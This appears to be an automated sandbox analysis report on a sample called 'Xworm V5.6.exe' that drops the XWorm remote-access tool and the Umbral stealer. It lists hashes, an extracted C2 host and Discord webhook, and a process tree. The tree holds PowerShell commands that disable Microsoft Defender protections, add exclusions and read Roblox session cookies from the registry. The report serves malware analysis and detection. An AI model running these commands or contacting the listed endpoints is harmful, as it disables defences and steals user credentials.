Analysis
-
max time kernel
31s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
11-09-2024 07:15
Static task
static1
Behavioral task
behavioral1
Sample
Xworm V5.6.exe
Resource
win7-20240903-en
General
-
Target
Xworm V5.6.exe
-
Size
5.3MB
-
MD5
71319d9c7244075e18e462cdb2b642dc
-
SHA1
59f1ef7559d6b8902f165b78812faa42732f629e
-
SHA256
2afdd6f9d3dce3f30579c42c5391f3e822b3661d479267535a417df7513c32de
-
SHA512
68025d708f25ebfa287d6e5c5276fd50b3f316d67788806bf104920c36618e4f431d4947e8eb80fdc9a0dc9bf4b49b35054ef8af43620c7a3f744a2a45755979
-
SSDEEP
98304:1uF3rbJB8T+T+Zd/2fCAKBDAeYKC121GJ+YJaUARBtsklH4l1Ov:a7bHiZd/2PKBpYKkxkRBt9Hc1y
Malware Config
Extracted
xworm
5.0
127.0.0.1:23016
one-mid.gl.at.ply.gg:23016
IoMmnLuONrXyyCZg
-
Install_directory
%AppData%
-
install_file
XClient.exe
Extracted
umbral
https://discord.com/api/webhooks/1246465154703560774/0XX7gYV6mBTghnI54kRnbOd7hI5OEzQSCB8dc1meM8EJEt2RkFbvlnW0D7XaBzw9i5h1
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0009000000015d2a-63.dat family_umbral behavioral1/memory/2908-69-0x0000000000E60000-0x0000000000EA0000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x000a000000015d79-59.dat family_xworm behavioral1/memory/2084-64-0x0000000000D00000-0x0000000000D10000-memory.dmp family_xworm -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
pid Process 1484 powershell.exe 2176 powershell.exe 988 powershell.exe 956 powershell.exe 2068 powershell.exe 2340 powershell.exe 1864 powershell.exe 1316 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Drops startup file 4 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xworm V5.6.exe Xworm V5.6.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.exe Xworm V5.6.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk system.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk system.exe -
Executes dropped EXE 3 IoCs
pid Process 2836 Xworm V5.6.exe 2084 system.exe 2908 Umbral.exe -
Loads dropped DLL 4 IoCs
pid Process 2384 Xworm V5.6.exe 2384 Xworm V5.6.exe 2384 Xworm V5.6.exe 2384 Xworm V5.6.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" system.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 12 discord.com 13 discord.com -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com 10 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 2384 Xworm V5.6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Xworm V5.6.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 1328 cmd.exe 2432 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2544 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 2432 PING.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2384 Xworm V5.6.exe 2384 Xworm V5.6.exe 2908 Umbral.exe 1316 powershell.exe 1484 powershell.exe 2176 powershell.exe 2548 powershell.exe 988 powershell.exe 956 powershell.exe 2068 powershell.exe 2340 powershell.exe 1864 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2084 system.exe Token: SeDebugPrivilege 2908 Umbral.exe Token: SeIncreaseQuotaPrivilege 1496 wmic.exe Token: SeSecurityPrivilege 1496 wmic.exe Token: SeTakeOwnershipPrivilege 1496 wmic.exe Token: SeLoadDriverPrivilege 1496 wmic.exe Token: SeSystemProfilePrivilege 1496 wmic.exe Token: SeSystemtimePrivilege 1496 wmic.exe Token: SeProfSingleProcessPrivilege 1496 wmic.exe Token: SeIncBasePriorityPrivilege 1496 wmic.exe Token: SeCreatePagefilePrivilege 1496 wmic.exe Token: SeBackupPrivilege 1496 wmic.exe Token: SeRestorePrivilege 1496 wmic.exe Token: SeShutdownPrivilege 1496 wmic.exe Token: SeDebugPrivilege 1496 wmic.exe Token: SeSystemEnvironmentPrivilege 1496 wmic.exe Token: SeRemoteShutdownPrivilege 1496 wmic.exe Token: SeUndockPrivilege 1496 wmic.exe Token: SeManageVolumePrivilege 1496 wmic.exe Token: 33 1496 wmic.exe Token: 34 1496 wmic.exe Token: 35 1496 wmic.exe Token: SeIncreaseQuotaPrivilege 1496 wmic.exe Token: SeSecurityPrivilege 1496 wmic.exe Token: SeTakeOwnershipPrivilege 1496 wmic.exe Token: SeLoadDriverPrivilege 1496 wmic.exe Token: SeSystemProfilePrivilege 1496 wmic.exe Token: SeSystemtimePrivilege 1496 wmic.exe Token: SeProfSingleProcessPrivilege 1496 wmic.exe Token: SeIncBasePriorityPrivilege 1496 wmic.exe Token: SeCreatePagefilePrivilege 1496 wmic.exe Token: SeBackupPrivilege 1496 wmic.exe Token: SeRestorePrivilege 1496 wmic.exe Token: SeShutdownPrivilege 1496 wmic.exe Token: SeDebugPrivilege 1496 wmic.exe Token: SeSystemEnvironmentPrivilege 1496 wmic.exe Token: SeRemoteShutdownPrivilege 1496 wmic.exe Token: SeUndockPrivilege 1496 wmic.exe Token: SeManageVolumePrivilege 1496 wmic.exe Token: 33 1496 wmic.exe Token: 34 1496 wmic.exe Token: 35 1496 wmic.exe Token: SeDebugPrivilege 1316 powershell.exe Token: SeDebugPrivilege 1484 powershell.exe Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 2548 powershell.exe Token: SeIncreaseQuotaPrivilege 1552 wmic.exe Token: SeSecurityPrivilege 1552 wmic.exe Token: SeTakeOwnershipPrivilege 1552 wmic.exe Token: SeLoadDriverPrivilege 1552 wmic.exe Token: SeSystemProfilePrivilege 1552 wmic.exe Token: SeSystemtimePrivilege 1552 wmic.exe Token: SeProfSingleProcessPrivilege 1552 wmic.exe Token: SeIncBasePriorityPrivilege 1552 wmic.exe Token: SeCreatePagefilePrivilege 1552 wmic.exe Token: SeBackupPrivilege 1552 wmic.exe Token: SeRestorePrivilege 1552 wmic.exe Token: SeShutdownPrivilege 1552 wmic.exe Token: SeDebugPrivilege 1552 wmic.exe Token: SeSystemEnvironmentPrivilege 1552 wmic.exe Token: SeRemoteShutdownPrivilege 1552 wmic.exe Token: SeUndockPrivilege 1552 wmic.exe Token: SeManageVolumePrivilege 1552 wmic.exe Token: 33 1552 wmic.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 2384 wrote to memory of 2836 2384 Xworm V5.6.exe 30 PID 2384 wrote to memory of 2836 2384 Xworm V5.6.exe 30 PID 2384 wrote to memory of 2836 2384 Xworm V5.6.exe 30 PID 2384 wrote to memory of 2836 2384 Xworm V5.6.exe 30 PID 2384 wrote to memory of 2084 2384 Xworm V5.6.exe 31 PID 2384 wrote to memory of 2084 2384 Xworm V5.6.exe 31 PID 2384 wrote to memory of 2084 2384 Xworm V5.6.exe 31 PID 2384 wrote to memory of 2084 2384 Xworm V5.6.exe 31 PID 2384 wrote to memory of 2908 2384 Xworm V5.6.exe 32 PID 2384 wrote to memory of 2908 2384 Xworm V5.6.exe 32 PID 2384 wrote to memory of 2908 2384 Xworm V5.6.exe 32 PID 2384 wrote to memory of 2908 2384 Xworm V5.6.exe 32 PID 2908 wrote to memory of 1496 2908 Umbral.exe 34 PID 2908 wrote to memory of 1496 2908 Umbral.exe 34 PID 2908 wrote to memory of 1496 2908 Umbral.exe 34 PID 2908 wrote to memory of 380 2908 Umbral.exe 36 PID 2908 wrote to memory of 380 2908 Umbral.exe 36 PID 2908 wrote to memory of 380 2908 Umbral.exe 36 PID 2908 wrote to memory of 1316 2908 Umbral.exe 38 PID 2908 wrote to memory of 1316 2908 Umbral.exe 38 PID 2908 wrote to memory of 1316 2908 Umbral.exe 38 PID 2908 wrote to memory of 1484 2908 Umbral.exe 40 PID 2908 wrote to memory of 1484 2908 Umbral.exe 40 PID 2908 wrote to memory of 1484 2908 Umbral.exe 40 PID 2908 wrote to memory of 2176 2908 Umbral.exe 42 PID 2908 wrote to memory of 2176 2908 Umbral.exe 42 PID 2908 wrote to memory of 2176 2908 Umbral.exe 42 PID 2908 wrote to memory of 2548 2908 Umbral.exe 44 PID 2908 wrote to memory of 2548 2908 Umbral.exe 44 PID 2908 wrote to memory of 2548 2908 Umbral.exe 44 PID 2908 wrote to memory of 1552 2908 Umbral.exe 46 PID 2908 wrote to memory of 1552 2908 Umbral.exe 46 PID 2908 wrote to memory of 1552 2908 Umbral.exe 46 PID 2908 wrote to memory of 1548 2908 Umbral.exe 48 PID 2908 wrote to memory of 1548 2908 Umbral.exe 48 PID 2908 wrote to memory of 1548 2908 Umbral.exe 48 PID 2908 wrote to memory of 1924 2908 Umbral.exe 50 PID 2908 wrote to memory of 1924 2908 Umbral.exe 50 PID 2908 wrote to memory of 1924 2908 Umbral.exe 50 PID 2908 wrote to memory of 988 2908 Umbral.exe 52 PID 2908 wrote to memory of 988 2908 Umbral.exe 52 PID 2908 wrote to memory of 988 2908 Umbral.exe 52 PID 2084 wrote to memory of 956 2084 system.exe 54 PID 2084 wrote to memory of 956 2084 system.exe 54 PID 2084 wrote to memory of 956 2084 system.exe 54 PID 2908 wrote to memory of 2544 2908 Umbral.exe 56 PID 2908 wrote to memory of 2544 2908 Umbral.exe 56 PID 2908 wrote to memory of 2544 2908 Umbral.exe 56 PID 2084 wrote to memory of 2068 2084 system.exe 58 PID 2084 wrote to memory of 2068 2084 system.exe 58 PID 2084 wrote to memory of 2068 2084 system.exe 58 PID 2908 wrote to memory of 1328 2908 Umbral.exe 60 PID 2908 wrote to memory of 1328 2908 Umbral.exe 60 PID 2908 wrote to memory of 1328 2908 Umbral.exe 60 PID 1328 wrote to memory of 2432 1328 cmd.exe 62 PID 1328 wrote to memory of 2432 1328 cmd.exe 62 PID 1328 wrote to memory of 2432 1328 cmd.exe 62 PID 2084 wrote to memory of 2340 2084 system.exe 64 PID 2084 wrote to memory of 2340 2084 system.exe 64 PID 2084 wrote to memory of 2340 2084 system.exe 64 PID 2084 wrote to memory of 1864 2084 system.exe 66 PID 2084 wrote to memory of 1864 2084 system.exe 66 PID 2084 wrote to memory of 1864 2084 system.exe 66 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 380 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"C:\Users\Admin\AppData\Local\Temp\Xworm V5.6.exe"1⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xworm V5.6.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xworm V5.6.exe"2⤵
- Executes dropped EXE
PID:2836
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'system.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1864
-
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:380
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1552
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:1548
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:1924
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:988
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:2544
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1328 -
C:\Windows\system32\PING.EXEping localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2432
-
-
-
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Hide Artifacts
1Hidden Files and Directories
1Modify Registry
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55473c6bc76b312544fff68f37ea752b9
SHA179333b1eaa69f98715fbfa404c29a1b3b48f43fe
SHA2567d9513e66fba8fbac33906ca1dd8d210a499964f6413ef0e1129c3b2182f48aa
SHA5120825a705f7c9710fef6cdd3181e13949e5d077b3bed7910e5430ad2e2c040f3f11323bf766da610a8c7b2c2787bdec2bf441071e9ac25880832e28da23fe06bf
-
Filesize
9KB
MD526abb9e459e5976f658ce80d6433f1b1
SHA13c8f02c1cf7b8ae82be3deea4b360497f6fee1c3
SHA25660cc77b5d4210cef0a9032908b179142f212155426fdae48055c5f72811f7a12
SHA512c2c02aa1db8036c7309100bb683ec7708fedfb129d763d86e03d9d6adc3688423ec04cb5b596eaf99300787f90d641e53350e1ceed0e8b11d6f29333e04b4ce8
-
Filesize
37KB
MD59cf1b7d94d201f382ca08e39a13a6739
SHA1fd81cec8cbdbe342248aafa01b04dedf72dd0716
SHA25623a4cfe7a3a681a37cbbf193556145dbb9795f9527f488f0bd750b0788d7a4ba
SHA512fd954d96fc407b555a2c3b332ff8235a7750f2f7ffd749450253d5e3ffd5c2ca760976176425f8cbf419000f9d4064a7e3e45f4e90b8422f6d46200453283ff8
-
Filesize
231KB
MD5d7cf4e6577214afdd18a51fed357f478
SHA19a16579f2b5ca279fb13091c644c430290a64d1a
SHA2560cf1cdcf9de2637fb85dc29c3076a6b018fff0ef30d13b3b83784e63300d5bde
SHA512cc9c6f00c3b0dbefbd5b598c3fc90902328dc27e8b3c6b29811eb8e250046e165666ac7e64e2b33074be48932726c455f847b5071dd9a69506722a7f1f5c040c